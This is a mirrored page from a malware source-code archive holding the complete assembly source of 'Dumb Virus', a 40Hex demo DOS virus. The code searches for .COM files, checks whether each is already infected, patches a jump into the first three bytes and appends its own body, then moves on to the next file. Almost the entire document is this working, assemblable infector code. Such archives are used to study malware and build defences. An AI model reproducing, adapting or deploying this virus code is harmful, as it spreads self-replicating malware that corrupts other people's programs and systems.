mirror of
https://github.com/vxunderground/MalwareSourceCode.git
synced 2024-12-29 22:45:27 +00:00
117 lines
3.8 KiB
NASM
117 lines
3.8 KiB
NASM
|
DumbVirus segment
|
||
|
Assume CS:DumbVirus
|
||
|
Org 100h ; account for PSP
|
||
|
|
||
|
; Dumb Virus - 40Hex demo virus
|
||
|
; Assemble with TASM /m2
|
||
|
|
||
|
Start: db 0e9h ; jmp duh
|
||
|
dw 0
|
||
|
|
||
|
; This is where the virus starts
|
||
|
duh: call next
|
||
|
next: pop bp ; bp holds current location
|
||
|
sub bp, offset next ; calculate net change
|
||
|
|
||
|
; Restore the original first three bytes
|
||
|
lea si, [bp+offset stuff]
|
||
|
mov di, 100h
|
||
|
; Put 100h on the stack for the retn later
|
||
|
; This will allow for the return to the beginning of the file
|
||
|
push di
|
||
|
movsw
|
||
|
movsb
|
||
|
|
||
|
; Change DTA from default (otherwise Findfirst/next will destroy
|
||
|
; commandline parametres
|
||
|
lea dx, [bp+offset dta]
|
||
|
call set_dta
|
||
|
|
||
|
mov ah, 4eh ; Find first
|
||
|
lea dx, [bp+masker] ; search for '*.COM',0
|
||
|
xor cx, cx ; attribute mask - this is unnecessary
|
||
|
tryanother:
|
||
|
int 21h
|
||
|
jc quit ; Quit on error
|
||
|
|
||
|
; Open file for read/write
|
||
|
; Note: This fails on read-only files
|
||
|
mov ax, 3D02h
|
||
|
lea dx, [bp+offset dta+30] ; File name is located in DTA
|
||
|
int 21h
|
||
|
xchg ax, bx
|
||
|
|
||
|
; Read in the first three bytes
|
||
|
mov ah, 3fh
|
||
|
lea dx, [bp+stuff]
|
||
|
mov cx, 3
|
||
|
int 21h
|
||
|
|
||
|
; Check for previous infection
|
||
|
mov ax, word ptr [bp+dta+26] ; ax = filesize
|
||
|
mov cx, word ptr [bp+stuff+1] ; jmp location
|
||
|
add cx, eov - duh + 3 ; convert to filesize
|
||
|
cmp ax, cx ; if same, already infected
|
||
|
jz close ; so quit out of here
|
||
|
|
||
|
; Calculate the offset of the jmp
|
||
|
sub ax, 3 ; ax = filesize - 3
|
||
|
mov word ptr [bp+writebuffer], ax
|
||
|
|
||
|
; Go to the beginning of the file
|
||
|
xor al, al
|
||
|
call f_ptr
|
||
|
|
||
|
; Write the three bytes
|
||
|
mov ah, 40h
|
||
|
mov cx, 3
|
||
|
lea dx, [bp+e9]
|
||
|
int 21h
|
||
|
|
||
|
; Go to the end of the file
|
||
|
mov al, 2
|
||
|
call f_ptr
|
||
|
|
||
|
; And write the rest of the virus
|
||
|
mov ah, 40h
|
||
|
mov cx, eov - duh
|
||
|
lea dx, [bp+duh]
|
||
|
int 21h
|
||
|
|
||
|
close:
|
||
|
mov ah, 3eh
|
||
|
int 21h
|
||
|
|
||
|
; Try infecting another file
|
||
|
mov ah, 4fh ; Find next
|
||
|
jmp short tryanother
|
||
|
|
||
|
; Restore the DTA and return control to the original program
|
||
|
quit: mov dx, 80h ; Restore current DTA to
|
||
|
; the default @ PSP:80h
|
||
|
set_dta:
|
||
|
mov ah, 1ah ; Set disk transfer address
|
||
|
int 21h
|
||
|
retn
|
||
|
f_ptr: mov ah, 42h
|
||
|
xor cx, cx
|
||
|
cwd ; equivalent to: xor dx, dx
|
||
|
int 21h
|
||
|
retn
|
||
|
|
||
|
masker db '*.com',0
|
||
|
; Original three bytes of the infected file
|
||
|
; Currently holds a INT 20h instruction and a null byte
|
||
|
stuff db 0cdh, 20h, 0
|
||
|
e9 db 0e9h
|
||
|
eov equ $ ; End of the virus
|
||
|
; The following variables are stored in the heap space (the area between
|
||
|
; the stack and the code) and are not part of the virus that is written
|
||
|
; to files.
|
||
|
writebuffer dw ? ; Scratch area holding the
|
||
|
; JMP offset
|
||
|
dta db 42 dup (?)
|
||
|
DumbVirus ENDS
|
||
|
END Start
|
||
|
|